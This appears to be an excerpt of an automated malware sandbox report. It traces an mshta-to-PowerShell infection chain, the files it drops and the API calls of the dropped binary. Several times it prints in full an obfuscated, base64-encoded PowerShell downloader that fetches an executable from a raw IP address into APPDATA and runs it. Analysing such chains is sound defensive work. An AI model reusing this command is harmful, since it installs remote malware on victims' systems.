iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"	Jump to behavior

Suspicious command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline"			Jump to behavior

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00514B37 LoadLibraryA,GetProcAddress,

6_2_00514B37

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00EF36CD push ebx; iretd	3_2_00EF36DA
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0051C4C6 push A30051BAh; retn 0051h	6_2_0051C50D
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00538945 push ecx; ret	6_2_00538958
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0234F273 push ebp; retf	7_2_0234F281

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\cosses[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\cossess.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_005148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		6_2_005148D7
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00595376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		6_2_00595376

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00533187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_00533187

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
